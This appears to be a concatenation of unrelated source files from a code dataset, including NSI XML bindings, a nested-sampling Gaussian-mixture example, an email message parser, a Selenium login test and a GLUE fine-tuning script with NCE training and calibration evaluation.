surf.knotvector_v = utilities.generate_knot_vector(surf.degree_v, 6)
# Set evaluation delta
surf.delta = 0.025
# Evaluate surface
surf.evaluate()
# Plot the control point grid and the evaluated surface
vis_comp = VisPlotly.VisSurface()
surf.vis = vis_comp
surf.render()
# Evaluate surface tangent and normal at the given u and v
uv = [0.2, 0.9]
surf_tangent = operations.tangent(surf, uv)
surf_normal = operations.normal(surf, uv)
# Good to have something here to put a breakpoint
pass
| 2.765625 | 3 |
dev/bazel/deps/micromkl.bzl | cmsxbc/oneDAL | 169 | 10865 | <filename>dev/bazel/deps/micromkl.bzl<gh_stars>100-1000
#===============================================================================
# Copyright 2020-2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
load("@onedal//dev/bazel:repos.bzl", "repos")
micromkl_repo = repos.prebuilt_libs_repo_rule(
includes = [
"include",
"%{os}/include",
],
libs = [
"%{os}/lib/intel64/libdaal_mkl_thread.a",
"%{os}/lib/intel64/libdaal_mkl_sequential.a",
"%{os}/lib/intel64/libdaal_vmlipp_core.a",
],
build_template = "@onedal//dev/bazel/deps:micromkl.tpl.BUILD",
)
micromkl_dpc_repo = repos.prebuilt_libs_repo_rule(
includes = [
"include",
],
libs = [
"lib/intel64/libdaal_sycl.a",
],
build_template = "@onedal//dev/bazel/deps:micromkldpc.tpl.BUILD",
)
| 1.492188 | 1 |
opennsa/protocols/nsi2/bindings/p2pservices.py | jmacauley/opennsa | 0 | 10866 | ## Generated by pyxsdgen
from xml.etree import ElementTree as ET
# types
class OrderedStpType(object):
def __init__(self, order, stp):
self.order = order # int
self.stp = stp # StpIdType -> string
@classmethod
def build(self, element):
return OrderedStpType(
element.get('order'),
element.findtext('stp')
)
def xml(self, elementName):
r = ET.Element(elementName, attrib={'order' : str(self.order)})
ET.SubElement(r, 'stp').text = self.stp
return r
class TypeValueType(object):
def __init__(self, type_, value):
self.type_ = type_
self.value = value
@classmethod
def build(self, element):
return TypeValueType(
element.get('type'),
element.text
)
def xml(self, elementName):
r = ET.Element(elementName, attrib={'type' : self.type_})
r.text = self.value
return r
class P2PServiceBaseType(object):
def __init__(self, capacity, directionality, symmetricPath, sourceSTP, destSTP, ero, parameter):
self.capacity = capacity # long
self.directionality = directionality # DirectionalityType -> string
self.symmetricPath = symmetricPath # boolean
self.sourceSTP = sourceSTP # StpIdType -> string
self.destSTP = destSTP # StpIdType -> string
self.ero = ero # [ OrderedStpType ]
self.parameter = parameter # [ TypeValueType ]
@classmethod
def build(self, element):
return P2PServiceBaseType(
int(element.findtext('capacity')),
element.findtext('directionality'),
True if element.findtext('symmetricPath') == 'true' else False if element.find('symmetricPath') is not None else None,
element.findtext('sourceSTP'),
element.findtext('destSTP'),
[ OrderedStpType.build(e) for e in element.find('ero') ] if element.find('ero') is not None else None,
[ TypeValueType.build(e) for e in element.findall('parameter') ] if element.find('parameter') is not None else None
)
def xml(self, elementName):
r = ET.Element(elementName)
ET.SubElement(r, 'capacity').text = str(self.capacity)
ET.SubElement(r, 'directionality').text = self.directionality
if self.symmetricPath is not None:
ET.SubElement(r, 'symmetricPath').text = 'true' if self.symmetricPath else 'false'
ET.SubElement(r, 'sourceSTP').text = self.sourceSTP
ET.SubElement(r, 'destSTP').text = self.destSTP
if self.ero is not None:
ET.SubElement(r, 'ero').extend( [ e.xml('orderedSTP') for e in self.ero ] )
if self.parameter is not None:
for p in self.parameter:
ET.SubElement(r, 'parameter', attrib={'type': p.type_}).text = p.value
return r
POINT2POINT_NS = 'http://schemas.ogf.org/nsi/2013/12/services/point2point'
p2ps = ET.QName(POINT2POINT_NS, 'p2ps')
capacity = ET.QName(POINT2POINT_NS, 'capacity')
parameter = ET.QName(POINT2POINT_NS, 'parameter')
def parse(input_):
root = ET.fromstring(input_)
return parseElement(root)
def parseElement(element):
type_map = {
str(p2ps) : P2PServiceBaseType,
str(parameter) : TypeValueType
}
if not element.tag in type_map:
raise ValueError('No type mapping for tag %s' % element.tag)
type_ = type_map[element.tag]
return type_.build(element)
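# Hedged usage sketch (not part of the generated bindings): build a request type,
# serialize it and parse it back. The STP URNs and the parameter name/value are
# placeholders, not values mandated by the schema.
if __name__ == "__main__":
    demo = P2PServiceBaseType(
        capacity=1000,
        directionality="Bidirectional",
        symmetricPath=True,
        sourceSTP="urn:ogf:network:example.org:2013:stp-a",
        destSTP="urn:ogf:network:example.org:2013:stp-b",
        ero=None,
        parameter=[TypeValueType("protection", "unprotected")])
    xml_bytes = ET.tostring(demo.xml(p2ps))
    print(xml_bytes.decode())
    roundtrip = parseElement(ET.fromstring(xml_bytes))
    print(roundtrip.capacity, roundtrip.sourceSTP)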
| 2.5 | 2 |
Scripts/PyLecTest.py | DVecchione/DVEC | 0 | 10867 | import matplotlib.pyplot as plt
import numpy as np
x=20
y=1
plt.plot(x,y)
plt.show()
| 3.03125 | 3 |
examples/nested/mog4_fast.py | ivandebono/nnest | 0 | 10868 | import os
import sys
import argparse
import copy
import numpy as np
import scipy.special
sys.path.append(os.getcwd())
def log_gaussian_pdf(theta, sigma=1, mu=0, ndim=None):
if ndim is None:
try:
ndim = len(theta)
except TypeError:
assert isinstance(theta, (float, int)), theta
ndim = 1
logl = -(np.sum((theta - mu) ** 2) / (2 * sigma ** 2))
logl -= np.log(2 * np.pi * (sigma ** 2)) * ndim / 2.0
return logl
class Gaussian(object):
def __init__(self, sigma=1.0, nderived=0):
self.sigma = sigma
self.nderived = nderived
def __call__(self, theta):
logl = log_gaussian_pdf(theta, sigma=self.sigma, mu=0)
return logl, [0.0] * self.nderived
class GaussianMix(object):
def __init__(self, sep=4, weights=(0.4, 0.3, 0.2, 0.1), sigma=1,
nderived=0):
assert len(weights) in [2, 3, 4], (
'Weights must have 2, 3 or 4 components. Weights=' + str(weights))
assert np.isclose(sum(weights), 1), (
'Weights must sum to 1! Weights=' + str(weights))
self.nderived = nderived
self.weights = weights
self.sigmas = [sigma] * len(weights)
positions = []
positions.append(np.asarray([0, sep]))
positions.append(np.asarray([0, -sep]))
positions.append(np.asarray([sep, 0]))
positions.append(np.asarray([-sep, 0]))
self.positions = positions[:len(weights)]
def __call__(self, theta):
thetas = []
for pos in self.positions:
thetas.append(copy.deepcopy(theta))
thetas[-1][:2] -= pos
logls = [(Gaussian(sigma=self.sigmas[i])(thetas[i])[0]
+ np.log(self.weights[i])) for i in range(len(self.weights))]
logl = scipy.special.logsumexp(logls)
return logl, [0.0] * self.nderived
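    # The mixture log-likelihood evaluated above is
    #   log L(theta) = logsumexp_i [ log(w_i) + log N(theta | mu_i, sigma_i^2 I) ],
    # with the component means placed at (0, +/-sep) and (+/-sep, 0).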
def main(args):
from nnest import NestedSampler
g = GaussianMix()
def loglike(z):
return np.array([g(x)[0] for x in z])
def transform(x):
return 10. * x
volume_switch = 1.0 / (5 * args.num_slow)
sampler = NestedSampler(args.x_dim, loglike, transform=transform, log_dir=args.log_dir, num_live_points=args.num_live_points,
hidden_dim=args.hidden_dim, num_layers=args.num_layers, num_blocks=args.num_blocks, num_slow=args.num_slow,
use_gpu=args.use_gpu)
sampler.run(train_iters=args.train_iters, mcmc_steps=args.mcmc_steps, volume_switch=volume_switch, noise=args.noise)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--x_dim', type=int, default=5,
help="Dimensionality")
parser.add_argument('--train_iters', type=int, default=2000,
help="number of train iters")
parser.add_argument("--mcmc_steps", type=int, default=0)
parser.add_argument("--num_live_points", type=int, default=1000)
parser.add_argument('--switch', type=float, default=-1)
parser.add_argument('--hidden_dim', type=int, default=128)
parser.add_argument('--num_layers', type=int, default=2)
parser.add_argument('--batch_size', type=int, default=100)
parser.add_argument('-use_gpu', action='store_true')
parser.add_argument('--flow', type=str, default='nvp')
parser.add_argument('--num_blocks', type=int, default=5)
parser.add_argument('--noise', type=float, default=-1)
parser.add_argument('--run_num', type=str, default='')
parser.add_argument('--num_slow', type=int, default=2)
parser.add_argument('--log_dir', type=str, default='logs/mog4_fast')
args = parser.parse_args()
main(args)
| 2.609375 | 3 |
sendria/message.py | scottcove/sendria | 85 | 10869 | <gh_stars>10-100
__all__ = ['Message']
import uuid
from email.header import decode_header as _decode_header
from email.message import Message as EmailMessage
from email.utils import getaddresses
from typing import Union, List, Dict, Any
class Message:
__slots__ = (
'id',
'sender_envelope', 'sender_message',
'recipients_envelope', 'recipients_message_to',
'recipients_message_cc', 'recipients_message_bcc',
'subject',
'source',
'size', 'type', 'peer',
'parts',
'created_at',
)
@classmethod
def from_email(cls, email: EmailMessage) -> 'Message':
o = cls()
o.id = None
o.sender_envelope = cls.decode_header(email['X-MailFrom'])
o.sender_message = cls.decode_header(email['FROM'])
o.recipients_envelope = email['X-RcptTo']
o.recipients_message_to = cls.split_addresses(cls.decode_header(email['TO'])) if 'TO' in email else []
o.recipients_message_cc = cls.split_addresses(cls.decode_header(email['CC'])) if 'CC' in email else []
o.recipients_message_bcc = cls.split_addresses(cls.decode_header(email['BCC'])) if 'BCC' in email else []
o.subject = cls.decode_header(email['Subject'])
o.source = email.as_string()
o.size = len(o.source)
o.type = email.get_content_type()
        o.peer = ':'.join([i.strip(" '()") for i in email['X-Peer'].split(',')])
o.parts = []
o.created_at = None
for part in cls.iter_message_parts(email):
cid = part.get('Content-Id') or str(uuid.uuid4())
if cid[0] == '<' and cid[-1] == '>':
cid = cid[1:-1]
o.parts.append({'cid': cid, 'part': part})
return o
def to_dict(self) -> Dict[str, Any]:
return {
k: getattr(self, k)
for k in self.__slots__
}
def __repr__(self) -> str:
r = []
for k in self.__slots__:
if k not in ('source', 'parts'):
r.append(f'{k}={getattr(self, k)}')
else:
r.append(f'{k}=...')
return f'<EmailMessage: {", ".join(r)}>'
@classmethod
def decode_header(cls, value: Union[str, bytes, None]) -> str:
if not value:
return ''
headers = []
for decoded, charset in _decode_header(value):
if isinstance(decoded, str):
headers.append(decoded.encode(charset or 'utf-8'))
else:
headers.append(decoded)
return (b''.join(headers)).decode()
@classmethod
def split_addresses(cls, value: str) -> List[str]:
return [('{0} <{1}>'.format(name, addr) if name else addr)
for name, addr in getaddresses([value])]
@classmethod
def iter_message_parts(cls, email: EmailMessage) -> EmailMessage:
if email.is_multipart():
for payload in email.get_payload():
for part in cls.iter_message_parts(payload):
yield part
else:
yield email
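# Hedged usage sketch (not part of sendria): the X-MailFrom / X-RcptTo / X-Peer
# headers are assumed to have been injected by the receiving SMTP layer before
# from_email() is called; the addresses below are placeholders.
if __name__ == "__main__":
    from email import message_from_string
    raw = (
        "X-MailFrom: alice@example.org\r\n"
        "X-RcptTo: bob@example.org\r\n"
        "X-Peer: ('127.0.0.1', 12345)\r\n"
        "From: Alice <alice@example.org>\r\n"
        "To: Bob <bob@example.org>\r\n"
        "Subject: Hello\r\n"
        "\r\n"
        "Hi Bob\r\n"
    )
    msg = Message.from_email(message_from_string(raw))
    print(msg.subject, msg.recipients_message_to, msg.peer)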
| 2.46875 | 2 |
myApps/test_web.py | Rocket-hodgepodge/NewsWeb | 0 | 10870 | <reponame>Rocket-hodgepodge/NewsWeb
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import unittest
class NewVisitorTest(unittest.TestCase):
def setUp(self):
self.timeout = 40
self.browser = webdriver.Chrome()
self.browser.set_page_load_timeout(self.timeout)
self.wait = WebDriverWait(self.browser, self.timeout)
def tearDown(self):
self.browser.quit()
def test_can_start_a_list_and_retrieve_it_later(self):
self.browser.get('https://www.baidu.com')
self.assertIn('百度', self.browser.title)
login_link = self.wait.until(
EC.element_to_be_clickable((By.LINK_TEXT, '登录')))
login_link.click()
login_link_2 = self.wait.until(
EC.element_to_be_clickable((By.ID, 'TANGRAM__PSP_10__footerULoginBtn')))
login_link_2.click()
username_input = self.wait.until(
EC.presence_of_element_located((By.ID, 'TANGRAM__PSP_10__userName')))
username_input.clear()
username_input.send_keys('<PASSWORD>')
password_input = self.wait.until(
EC.presence_of_element_located((By.ID, '<PASSWORD>__PSP_10__password')))
password_input.clear()
password_input.send_keys('<PASSWORD>')
login_submit_button = self.wait.until(
EC.element_to_be_clickable((By.ID, 'TANGRAM__PSP_10__submit')))
login_submit_button.click()
username_span = self.wait.until(
EC.presence_of_element_located((By.CSS_SELECTOR, '#s_username_top > span')))
self.assertEqual(username_span.text, 'PebbleApp')
# user_login_link = self.browser.find_element_by_id('TANGRAM__PSP_10__footerULoginBtn')
# user_login_link.click()
if __name__ == '__main__':
unittest.main(warnings='ignore')
| 2.640625 | 3 |
nce_glue/run_glue.py | salesforce/ebm_calibration_nlu | 7 | 10871 | <filename>nce_glue/run_glue.py<gh_stars>1-10
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Finetuning the library models for sequence classification on GLUE (Bert, XLM, XLNet, RoBERTa, Albert, XLM-RoBERTa)."""
import dataclasses
import logging
import os, math
import sys, copy
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional
import numpy as np
import torch
from transformers import AutoConfig, AutoModelForSequenceClassification, AutoTokenizer, EvalPrediction, GlueDataset
from transformers import BertModel, BertConfig
from transformers import GlueDataTrainingArguments as DataTrainingArguments
from transformers import (
HfArgumentParser,
TrainingArguments,
glue_compute_metrics,
glue_output_modes,
glue_tasks_num_labels,
set_seed,
)
from my_robustness import MyRandomTokenNoise
from my_trainer import MyTrainer
from my_glue_dataset import MyGlueDataset
from my_modeling_roberta import MyRobertaForSequenceClassification, MyRobertaForNCESequenceClassification
from transformers.data.processors.utils import InputFeatures, InputExample
#import matplotlib
#matplotlib.use('Agg')
#import matplotlib.pyplot as plt
from my_utils import setLogger
#import checklist_utils
logger = logging.getLogger()
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from s3"}
)
@dataclass
class CustomArguments:
do_eval_calibration: bool = field(default=False, metadata={"help": "Whether to print calibration."})
do_eval_scaling_binning_calibration: bool = field(default = False)
do_eval_noise_robustness: bool = field(default = False)
do_eval_checklist: bool = field(default = False)
do_energy_analysis: bool = field(default = False)
train_from_scratch: bool = field(default=False, metadata={"help": "Train from scratch."})
layer_num: int = field(default=2, metadata={"help": "The hidden layer number"})
eval_steps: int = field(default = -1, metadata = {"help": "evaluate steps"})
#my_learning_rate: float = field(default=2e-5) #just use the existing learning_rate
my_random_noise_rate: float = field(default=0)
fast_debug: int = field(default = 0)
nce_noise_file: str = field(default=None)
nce_noise_eval_file: str = field(default=None)
nce_noise_ratio: int = field(default = 1)
nce_lambda: float = field(default = 1)
noiselm_mode: str = field(default='normal')
nce_noise_batch_size: int = field(default = 32, metadata={'help':'nce_noise_batch'})
train_mode: str = field(default='normal') #or nce_noise
nce_mode: str = field(default='normal') #or normal or hidden or labeled or selflabeled
pcal_num_updates: int = field(default=10)
pcal_bin_size: int = field(default=20)
pcalloss_start_epochs: int = field(default=0)
pcal_train: bool = field(default=False)
pcalloss_lambda: float = field(default=1)
pcalloss_type: str = field(default='KL')
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments, CustomArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args, my_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args, my_args = parser.parse_args_into_dataclasses()
all_args = (model_args, data_args, training_args, my_args)
#training_args.learning_rate = my_args.my_learning_rate
if (
os.path.exists(training_args.output_dir)
and os.listdir(training_args.output_dir)
and training_args.do_train
and not training_args.overwrite_output_dir
):
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. Use --overwrite_output_dir to overcome."
)
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if training_args.local_rank in [-1, 0] else logging.WARN,
)
log_fn = training_args.output_dir + '/log_' + ('train_' if training_args.do_train else '') + ('eval_' if training_args.do_eval else '') + ('evalcalibration_' if my_args.do_eval_calibration else '') + '.txt'
print('logger file will be set to', log_fn)
os.system('mkdir -p ' + training_args.output_dir)
setLogger(logger, log_fn)
my_args.log_fn = log_fn
for kk in range(5): logger.info('==hostname %s', os.uname()[1])
logger.warning(
"Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s",
training_args.local_rank,
training_args.device,
training_args.n_gpu,
bool(training_args.local_rank != -1),
training_args.fp16,
)
logger.info("Training/evaluation parameters %s", training_args)
# Set seed
set_seed(training_args.seed)
try:
num_labels = glue_tasks_num_labels[data_args.task_name]
output_mode = glue_output_modes[data_args.task_name]
except KeyError:
raise ValueError("Task not found: %s" % (data_args.task_name))
# Load pretrained model and tokenizer
#
# Distributed training:
# The .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
config = AutoConfig.from_pretrained(
model_args.config_name if model_args.config_name else model_args.model_name_or_path,
num_labels=num_labels,
finetuning_task=data_args.task_name,
cache_dir=model_args.cache_dir,
)
tokenizer = AutoTokenizer.from_pretrained(
model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
)
if my_args.train_mode == 'normal':
assert('roberta' in model_args.model_name_or_path.lower())
#model = AutoModelForSequenceClassification.from_pretrained(
model = MyRobertaForSequenceClassification.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
)
if my_args.train_mode == 'nce_noise':
#nce_model = MyRobertaForSequenceClassification(config)
assert('roberta' in model_args.model_name_or_path.lower())
model = MyRobertaForNCESequenceClassification.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
)
if my_args.train_from_scratch:
print('=== training from scratch! reinitilize weights')
embed_bak = copy.deepcopy(model.bert.embeddings)
layer_bak = copy.deepcopy(model.bert.encoder.layer)
model.init_weights()
LL = my_args.layer_num
print('=== applying layer_num', LL)
# Initializing a BERT bert-base-uncased style configuration
new_config = BertConfig(num_hidden_layers=LL)
# Initializing a model from the bert-base-uncased style configuration
new_bert = BertModel(new_config)
print('=== using pretrained embedding')
new_bert.embeddings = embed_bak
"""
for l in range(LL):
print('copying encoder layer', l)
new_bert.encoder.layer[l] = layer_bak[l]
"""
model.bert = new_bert
model.config.num_hidden_layers = LL
nce_noise_train_dataset, nce_noise_eval_dataset = None, None
if my_args.train_mode == 'nce_noise' and training_args.do_train:
# Get datasets
nce_noise_train_dataset = (MyGlueDataset(data_args, tokenizer=tokenizer, cache_dir=model_args.cache_dir, special_mode = 'nce_noise', nce_noise_file = my_args.nce_noise_file, mode = 'train', for_noiselm = False, my_args = my_args))
nce_noise_eval_dataset = (MyGlueDataset(data_args, tokenizer=tokenizer, cache_dir=model_args.cache_dir, special_mode = 'nce_noise', nce_noise_file = my_args.nce_noise_eval_file, mode = 'dev', for_noiselm = False, my_args = my_args))
# Get datasets
train_dataset = (
MyGlueDataset(data_args, tokenizer=tokenizer, cache_dir=model_args.cache_dir, my_args = my_args)
)
eval_dataset = (MyGlueDataset(data_args, tokenizer=tokenizer, mode="dev", cache_dir=model_args.cache_dir, my_args = my_args))
test_dataset = (
MyGlueDataset(data_args, tokenizer=tokenizer, mode="test", cache_dir=model_args.cache_dir, my_args = my_args)
if training_args.do_predict
else None
)
def build_compute_metrics_fn(task_name: str) -> Callable[[EvalPrediction], Dict]:
def compute_metrics_fn(p: EvalPrediction):
if output_mode == "classification":
preds = np.argmax(p.predictions, axis=1)
elif output_mode == "regression":
preds = np.squeeze(p.predictions)
return glue_compute_metrics(task_name, preds, p.label_ids)
return compute_metrics_fn
logger.info('constructing datasets (splitting eval_dataset) for calibration...')
dataset_cal_dev1 = copy.deepcopy(eval_dataset)
dataset_cal_dev2 = copy.deepcopy(eval_dataset)
dataset_cal_tr = copy.deepcopy(train_dataset)
cal_num = int(len(eval_dataset) / 2)
dataset_cal_dev1.features = dataset_cal_dev1.features[:cal_num]
dataset_cal_dev2.features = dataset_cal_dev2.features[-cal_num:]
#dataset_cal_tr.features = dataset_cal_tr.features[-cal_num:]
logger.info('setting eval_dataset to dataset_cal_dev2...')
eval_dataset = dataset_cal_dev2
# Initialize our Trainer
trainer = MyTrainer(
model=model,
args=training_args,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
compute_metrics=build_compute_metrics_fn(data_args.task_name),
tokenizer = tokenizer,
my_args = my_args,
)
print('=== random_noise_rate:', my_args.my_random_noise_rate)
my_noise = MyRandomTokenNoise(tokenizer, my_args.my_random_noise_rate)
input_transform = None
if my_args.my_random_noise_rate > 0:
input_transform = my_noise.add_random_noise
# Training
final_evalres_savefn = None
if training_args.do_train:
#if my_args.train_mode == 'nce_noise':
# trainer.nce_train(model_path=model_args.model_name_or_path if os.path.isdir(model_args.model_name_or_path) else None, input_transform = input_transform)
#else:
set_seed(training_args.seed) #set seed again before constructing suite, so that it will be the same thing when do_eval
suite = None
#suite = checklist_utils.construct_checklist_suite(model, tokenizer, eval_dataset, all_args)
return_d = {}
trainer.train(model_path=model_args.model_name_or_path if os.path.isdir(model_args.model_name_or_path) else None, input_transform = input_transform, train_mode = my_args.train_mode, nce_noise_dataset = nce_noise_train_dataset, nce_noise_ratio = my_args.nce_noise_ratio, nce_noise_bz = my_args.nce_noise_batch_size, nce_mode = my_args.nce_mode, nce_noise_eval_dataset = nce_noise_eval_dataset, return_d = return_d, checklist_suite = suite, all_args = all_args)
trainer.save_model()
# For convenience, we also re-save the tokenizer to the same directory,
# so that you can share your model easily on huggingface.co/models =)
if trainer.is_world_master():
tokenizer.save_pretrained(training_args.output_dir)
logger.info('===PRINTING EVAL_RES_LIS===')
for eval_res in return_d['eval_res_lis']:
logger.info(str(eval_res))
final_evalres_savefn = training_args.output_dir + '/eval_res_save/final_eval_res.save'
torch.save(return_d['eval_res_lis'], final_evalres_savefn)
logger.info('eval res saved to %s', final_evalres_savefn)
final_eval_results, final_checklist_eval_results = {}, {}
final_nce_eval_results, final_nce_train_results = {}, {}
# evaluation
eval_results = {}
"""
if data_args.task_name == "mnli":
mnli_mm_data_args = dataclasses.replace(data_args, task_name="mnli-mm")
logger.info('===SWITCHING to mnli-mm for test')
eval_dataset = GlueDataset(mnli_mm_data_args, tokenizer=tokenizer, mode="dev", cache_dir=model_args.cache_dir)
"""
logger.info('seed: %d', training_args.seed)
if training_args.do_eval:
logger.info("*** evaluate ***")
set_seed(training_args.seed) #set seed again before eval
# loop to handle mnli double evaluation (matched, mis-matched)
eval_datasets = [eval_dataset]
#""" #we only look at the matched dev-set for mnli (mm is mismatched)
assert(len(eval_datasets) == 1)
for eval_dataset in eval_datasets:
trainer.compute_metrics = build_compute_metrics_fn(eval_dataset.args.task_name)
#prediction_output = trainer.predict(test_dataset=eval_dataset)
eval_result = trainer.evaluate(eval_dataset=eval_dataset, input_transform = input_transform)
if my_args.train_mode == 'nce_noise':
eval_nce_result = trainer.nce_evaluate(nce_noise_eval_dataset)
final_nce_eval_results.update(eval_nce_result)
train_nce_result = trainer.nce_evaluate(nce_noise_train_dataset, max_step = 500)
final_nce_train_results.update(train_nce_result)
output_eval_file = os.path.join(
training_args.output_dir, f"eval_results_{eval_dataset.args.task_name}.txt"
)
if trainer.is_world_master():
with open(output_eval_file, "w") as writer:
logger.info("***** eval results {} *****".format(eval_dataset.args.task_name))
for key, value in eval_result.items():
logger.info(" %s = %s", key, value)
writer.write("%s = %s\n" % (key, value))
eval_results.update(eval_result)
#final_eval_results['eval_acc'] = eval_result['eval_acc']
final_eval_results.update(eval_result)
if my_args.do_eval_checklist:
        logger.info('*** eval checklist ***')
set_seed(training_args.seed) #set seed again before eval
suite = checklist_utils.construct_checklist_suite(model, tokenizer, eval_dataset, all_args)
cres = checklist_utils.run_checklist_suite(model, tokenizer, eval_dataset, all_args, given_suite = suite, verbose = True)
final_checklist_eval_results.update(cres)
"""
if data_args.task_name.lower() == 'qqp':
cres = checklist_utils.do_checklist_QQP(model, tokenizer, eval_dataset, all_args)
final_checklist_eval_results.update(cres)
if data_args.task_name.lower() == 'qnli':
cres = checklist_utils.do_checklist_QNLI(model, tokenizer, eval_dataset, all_args)
final_checklist_eval_results.update(cres)
if data_args.task_name.lower() == 'sst-2':
cres = checklist_utils.do_checklist_SST2(model, tokenizer, eval_dataset, all_args)
final_checklist_eval_results.update(cres)
"""
"""
for checklist_trans in ['typo', 'typo^2']:
eval_checklist_dataset = MyGlueDataset(data_args, tokenizer=tokenizer, mode="dev", cache_dir=model_args.cache_dir, checklist_transform = checklist_trans, my_args = my_args)
eval_result = trainer.evaluate(eval_dataset=eval_checklist_dataset, input_transform = None)
for s in eval_result:
final_checklist_eval_results['checklist_{}_{}'.format(checklist_trans, s)] = eval_result[s]
"""
if my_args.do_eval_noise_robustness:
# loop to handle mnli double evaluation (matched, mis-matched)
eval_datasets = [eval_dataset]
set_seed(training_args.seed) #set seed again before eval
"""
if data_args.task_name == "mnli":
mnli_mm_data_args = dataclasses.replace(data_args, task_name="mnli-mm")
eval_datasets.append(
GlueDataset(mnli_mm_data_args, tokenizer=tokenizer, mode="dev", cache_dir=model_args.cache_dir)
)
""" #we only look at the matched dev-set for mnli (mm is mismatched)
for noise_rate in [0.1, 0.2]:
logger.info('*** eval_noise_robustness rate: %f ***', noise_rate)
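            # Descriptive note: robustness is measured by re-running evaluation with random
            # token noise injected into the inputs at the given corruption rate.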
my_noise = MyRandomTokenNoise(tokenizer, noise_rate)
input_transform = my_noise.add_random_noise
assert(len(eval_datasets) == 1)
for eval_dataset in eval_datasets:
trainer.compute_metrics = build_compute_metrics_fn(eval_dataset.args.task_name)
#prediction_output = trainer.predict(test_dataset=eval_dataset)
eval_result = trainer.evaluate(eval_dataset=eval_dataset, input_transform = input_transform)
output_eval_file = os.path.join(
training_args.output_dir, f"eval_results_{eval_dataset.args.task_name}.txt"
)
if trainer.is_world_master():
with open(output_eval_file, "w") as writer:
logger.info("***** eval results {} *****".format(eval_dataset.args.task_name))
for key, value in eval_result.items():
logger.info(" %s = %s", key, value)
writer.write("%s = %s\n" % (key, value))
if 'eval_mnli/acc' in eval_result: eval_result['eval_acc'] = eval_result['eval_mnli/acc']
final_eval_results['randomnoise{}_eval_acc'.format(noise_rate)] = eval_result['eval_acc']
import calibration as cal
from my_calibration import TScalCalibrator
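    # Helper for post-hoc calibration analysis (descriptive note): it reports accuracy and
    # expected calibration error (ECE, 20 bins) on `eval_d`; when `do_postcal` is set it also
    # fits Platt-binning and/or temperature-style scaling (TScalCalibrator) on `tr_d` before
    # re-measuring ECE/accuracy on the recalibrated probabilities. `ss` prefixes the result keys.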
def do_cal(trainer, eval_d, do_postcal = False, do_plattbin = True, do_tscal = True, tr_d = None, ss = ''):
prediction_output = trainer.predict(test_dataset=eval_d)
probs_eval, labels_eval = torch.softmax(torch.FloatTensor(prediction_output.predictions), dim = -1), torch.LongTensor(prediction_output.label_ids)
if do_postcal == False:
ece = cal.get_ece(probs_eval.numpy(), labels_eval.numpy(), num_bins = 20)
acc = torch.sum(torch.argmax(probs_eval, dim = -1) == labels_eval).item() * 1.0 / labels_eval.size(0)
res = {}
if data_args.task_name.lower() == 'cola':
mcc_res = trainer.compute_metrics(EvalPrediction(predictions = prediction_output.predictions, label_ids = prediction_output.label_ids))
res[ss + 'mcc'] = mcc_res['mcc']
res.update({ss + 'acc': acc, ss + 'ece': ece})
logger.info('cal_res: %s', str(res))
return res
prediction_output = trainer.predict(test_dataset=tr_d)
probs_tr, labels_tr = torch.softmax(torch.FloatTensor(prediction_output.predictions), dim = -1), torch.LongTensor(prediction_output.label_ids)
res = {}
if do_plattbin == True:
calibrator = cal.PlattBinnerMarginalCalibrator(len(probs_tr), num_bins=20)
calibrator.train_calibration(probs_tr.numpy(), labels_tr.numpy())
calibrated_probs_eval = torch.FloatTensor(calibrator.calibrate(probs_eval.numpy()))
ece = cal.get_ece(calibrated_probs_eval.numpy(), labels_eval.numpy(), num_bins = 20)
acc = torch.sum(torch.argmax(calibrated_probs_eval, dim = -1) == labels_eval).item() * 1.0 / labels_eval.size(0)
if data_args.task_name.lower() == 'cola':
mcc_res = trainer.compute_metrics(EvalPrediction(predictions = torch.log(calibrated_probs_eval).numpy(), label_ids = labels_eval.numpy()))
